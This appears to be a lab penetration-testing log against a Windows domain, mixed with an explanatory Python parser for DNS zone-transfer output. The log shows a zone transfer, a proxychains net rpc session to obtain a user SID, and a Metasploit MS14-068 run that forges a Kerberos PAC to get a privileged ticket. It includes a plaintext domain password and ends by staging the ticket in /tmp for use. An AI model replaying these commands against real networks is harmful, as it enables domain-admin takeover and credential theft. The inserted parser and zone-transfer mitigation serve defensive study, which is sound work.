C:\Users\Admin\Desktop\Confidential data>type dns.contoso-west.org
type dns.contoso-west.org
> ls -d contoso-west.org
[dc2008r2-group1.contoso-west.org]
contoso-west.org. SOA dc2008r2-group1.contoso-west.org hostmaster.contoso-west.org. (292 900 600 86400 3600)
contoso-west.org. A 10.0.0.149
contoso-west.org. NS dc2008r2-group1.contoso-west.org
contoso-west.org. NS dcslave2008-group1.contoso-west.org
contoso-west.org. TXT "The DNS for the contoso-west.org domain is dc2008r2-group1.contoso-west.org."

_msdcs NS dc2008r2-group1.contoso-west.org
_gc._tcp.Default-First-Site-Name._sites SRV priority=0, weight=100, port=3268, dc2008r2-group1.contoso-west.org
_kerberos._tcp.Default-First-Site-Name._sites SRV priority=0, weight=100, port=88, dc2008r2-group1.contoso-west.org
_ldap._tcp.Default-First-Site-Name._sites SRV priority=0, weight=100, port=389, dc2008r2-group1.contoso-west.org
_gc._tcp SRV priority=0, weight=100, port=3268, dc2008r2-group1.contoso-west.org
_kerberos._tcp SRV priority=0, weight=100, port=88, dc2008r2-group1.contoso-west.org
_kpasswd._tcp SRV priority=0, weight=100, port=464, dc2008r2-group1.contoso-west.org
_ldap._tcp SRV priority=0, weight=100, port=389, dc2008r2-group1.contoso-west.org
_kerberos._udp SRV priority=0, weight=100, port=88, dc2008r2-group1.contoso-west.org
_kpasswd._udp SRV priority=0, weight=100, port=464, dc2008r2-group1.contoso-west.org
--> dc2008r2-group1 A 10.0.0.149 <--- DOMAIN CONTROLLER???
dcslave2008-group1 A 10.0.0.148
DomainDnsZones A 10.0.0.149


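The listing above came from nslookup's `ls -d`, which performs a zone transfer; the server answered it for an arbitrary client, so the whole domain-controller inventory (A, NS and the `_kerberos`/`_ldap`/`_kpasswd` SRV records) was handed out in one query. A defender auditing such output wants to know which hosts are real DCs and which are only name servers. The parser below is an added example, not code from the paste; the `ZONE_LISTING` sample is a constructed, cut-down copy of the records shown, and the `_zone_of`, `_fqdn`, `parse_zone_listing`, `domain_controllers` and `nameservers_without_dc_role` names are my own.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample input: a cut-down copy of the `ls -d` listing above
# (same lab hostnames and addresses), embedded so the block runs offline.
ZONE_LISTING = """\
[dc2008r2-group1.contoso-west.org]
contoso-west.org. SOA dc2008r2-group1.contoso-west.org hostmaster.contoso-west.org. (292 900 600 86400 3600)
contoso-west.org. A 10.0.0.149
contoso-west.org. NS dc2008r2-group1.contoso-west.org
contoso-west.org. NS dcslave2008-group1.contoso-west.org
_kerberos._tcp SRV priority=0, weight=100, port=88, dc2008r2-group1.contoso-west.org
_ldap._tcp SRV priority=0, weight=100, port=389, dc2008r2-group1.contoso-west.org
_kpasswd._tcp SRV priority=0, weight=100, port=464, dc2008r2-group1.contoso-west.org
_gc._tcp SRV priority=0, weight=100, port=3268, dc2008r2-group1.contoso-west.org
dc2008r2-group1 A 10.0.0.149
dcslave2008-group1 A 10.0.0.148
DomainDnsZones A 10.0.0.149
"""

# nslookup prints SRV data as "priority=N, weight=N, port=N, target".
SRV_RE = re.compile(
    r"priority=(?P<prio>\d+),\s*weight=(?P<weight>\d+),\s*port=(?P<port>\d+),\s*(?P<target>\S+)"
)

# SRV owner names every Windows domain controller registers; a host carrying
# all three is a DC, a host with only an NS record is just a name server.
DC_SERVICES = {"_kerberos._tcp", "_ldap._tcp", "_kpasswd._tcp"}


@dataclass
class Host:
    addr: Optional[str] = None
    nameserver: bool = False
    services: Dict[str, int] = field(default_factory=dict)  # relative SRV name -> port


def _zone_of(lines: List[str]) -> str:
    """Zone apex taken from the SOA line (printed with a trailing dot)."""
    for line in lines:
        parts = line.split()
        if len(parts) >= 2 and parts[1] == "SOA":
            return parts[0].rstrip(".")
    return ""


def _fqdn(name: str, zone: str) -> str:
    """Turn a relative owner name or target into a fully qualified name."""
    name = name.rstrip(".")
    if not zone or name == zone or name.endswith("." + zone):
        return name
    return f"{name}.{zone}"


def parse_zone_listing(text: str) -> Dict[str, Host]:
    """Parse `ls -d` output into FQDN -> Host (A, NS and SRV records only)."""
    lines = [s for s in (l.strip() for l in text.splitlines()) if s and not s.startswith("[")]
    zone = _zone_of(lines)
    hosts: Dict[str, Host] = {}
    for line in lines:
        parts = line.split(None, 2)
        if len(parts) < 3:
            continue
        name, rtype, rest = parts
        if rtype == "A":
            hosts.setdefault(_fqdn(name, zone), Host()).addr = rest.strip()
        elif rtype == "NS":
            hosts.setdefault(_fqdn(rest, zone), Host()).nameserver = True
        elif rtype == "SRV":
            m = SRV_RE.match(rest)
            if m:
                target = _fqdn(m.group("target"), zone)
                hosts.setdefault(target, Host()).services[name.rstrip(".")] = int(m.group("port"))
    return hosts


def domain_controllers(hosts: Dict[str, Host]) -> List[str]:
    """Hosts advertising the full Kerberos/LDAP/kpasswd SRV set."""
    return sorted(f for f, h in hosts.items() if DC_SERVICES.issubset(h.services))


def nameservers_without_dc_role(hosts: Dict[str, Host]) -> List[str]:
    """NS hosts with no DC SRV records (here the secondary DNS server)."""
    return sorted(f for f, h in hosts.items()
                  if h.nameserver and not DC_SERVICES.issubset(h.services))


if __name__ == "__main__":
    hosts = parse_zone_listing(ZONE_LISTING)
    print("domain controllers:", domain_controllers(hosts))
    print("name servers without DC role:", nameservers_without_dc_role(hosts))
```

On the sample the parser reports `dc2008r2-group1.contoso-west.org` as the only DC and `dcslave2008-group1.contoso-west.org` as an NS-only host, which matches the author's own "DOMAIN CONTROLLER???" annotation. The mitigation for the finding itself is on the server side: restrict zone transfers to the secondary's address so a client on the network cannot pull the listing at all.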
proxychains net rpc -W contoso-west.org -U blot -S 10.0.0.149 shell
ProxyChains-3.1 (http://proxychains.sf.net)
Enter blot's password:
|S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:445-<><>-OK
Talking to domain CONTOSO-WEST (S-1-5-21-3039018489-1111549232-2925702125)
net rpc> user
net rpc user> show
Usage: net rpc user show <username>
net rpc user show failed: NT_STATUS_INVALID_PARAMETER
net rpc user> show blot
user rid: 1109, group rid: 513
net rpc user> packet_write_wait: Connection to 2001:700:300:7::85 port 22: Broken pipe


auxiliary/admin/kerberos/ms14_068_kerberos_checksum


msf auxiliary(ms14_068_kerberos_checksum) > show info

Name: MS14-068 Microsoft Kerberos Checksum Validation Vulnerability
Module: auxiliary/admin/kerberos/ms14_068_kerberos_checksum
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2014-11-18

Provided by:
Tom Maddock
Sylvain Monne
juan vazquez <juan.vazquez@metasploit.com>

Basic options:
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
DOMAIN                     yes       The Domain (upper case) Ex: DEMO.LOCAL
PASSWORD                   yes       The Domain User password
RHOST                      yes       The target address
RPORT     88               yes       The target port
Timeout   10               yes       The TCP timeout to establish connection and read data
USER                       yes       The Domain User
USER_SID                   yes       The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000

Description:
This module exploits a vulnerability in the Microsoft Kerberos
implementation. The problem exists in the verification of the
Privilege Attribute Certificate (PAC) from a Kerberos TGS request,
where a domain user may forge a PAC with arbitrary privileges,
including Domain Administrator. This module requests a TGT ticket
with a forged PAC and exports it to a MIT Kerberos Credential Cache
file. It can be loaded on Windows systems with the Mimikatz help. It
has been tested successfully on Windows 2008.

References:
https://cvedetails.com/cve/CVE-2014-6324/
https://technet.microsoft.com/en-us/library/security/MS14-068
OSVDB (114751)
http://blogs.technet.com/b/srd/archive/2014/11/18/additional-information-about-cve-2014-6324.aspx
https://labs.mwrinfosecurity.com/blog/2014/12/16/digging-into-ms14-068-exploitation-and-defence/
https://github.com/bidord/pykek
https://community.rapid7.com/community/metasploit/blog/2014/12/25/12-days-of-haxmas-ms14-068-now-in-metasploit



msf auxiliary(ms14_068_kerberos_checksum) > set DOMAIN contoso-west.org
DOMAIN => contoso-west.org
msf auxiliary(ms14_068_kerberos_checksum) > set RHOST 10.0.0.149
RHOST => 10.0.0.149
msf auxiliary(ms14_068_kerberos_checksum) > set USER blot
USER => blot
msf auxiliary(ms14_068_kerberos_checksum) > set user_sid S-1-5-21-3039018489-1111549232-2925702125-1109
user_sid => S-1-5-21-3039018489-1111549232-2925702125-1109
msf auxiliary(ms14_068_kerberos_checksum) > set PASSWORD Bl0tt12309-
msf auxiliary(ms14_068_kerberos_checksum) > show options

Module options (auxiliary/admin/kerberos/ms14_068_kerberos_checksum):

Name      Current Setting                                  Required  Description
----      ---------------                                  --------  -----------
DOMAIN    contoso-west.org                                 yes       The Domain (upper case) Ex: DEMO.LOCAL
PASSWORD  Bl0tt12309-                                      yes       The Domain User password
RHOST     10.0.0.149                                       yes       The target address
RPORT     88                                               yes       The target port
Timeout   10                                               yes       The TCP timeout to establish connection and read data
USER      blot                                             yes       The Domain User
USER_SID  S-1-5-21-3039018489-1111549232-2925702125-1109   yes       The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000


msf auxiliary(ms14_068_kerberos_checksum) > run

[*] Validating options...
[*] Using domain CONTOSO-WEST.ORG...
[*] 10.0.0.149:88 - Sending AS-REQ...
[*] 10.0.0.149:88 - Parsing AS-REP...
[*] 10.0.0.149:88 - Sending TGS-REQ...
[+] 10.0.0.149:88 - Valid TGS-Response, extracting credentials...
[+] 10.0.0.149:88 - MIT Credential Cache saved on /root/.msf4/loot/20181109211513_default_10.0.0.149_windows.kerberos_173395.bin
[*] Auxiliary module execution completed

root@10-kali2-group10:~/.msf4/loot# ls
20181010173151_default_192.168.40.14_192.168.40.14_ce_775643.crt
20181010173151_default_192.168.40.14_192.168.40.14_ke_958653.key
20181010173151_default_192.168.40.14_192.168.40.14_pe_462147.pem
20181109211513_default_10.0.0.149_windows.kerberos_173395.bin
root@10-kali2-group10:~/.msf4/loot#


To use this ticket, which is in the Credential Cache (ccache) format, we need to move it to the /tmp directory where the Kerberos tools look for tickets.

root@10-kali2-group10:~/.msf4/loot# mv 20181109211513_default_10.0.0.149_windows.kerberos_173395.bin /tmp/krb5cc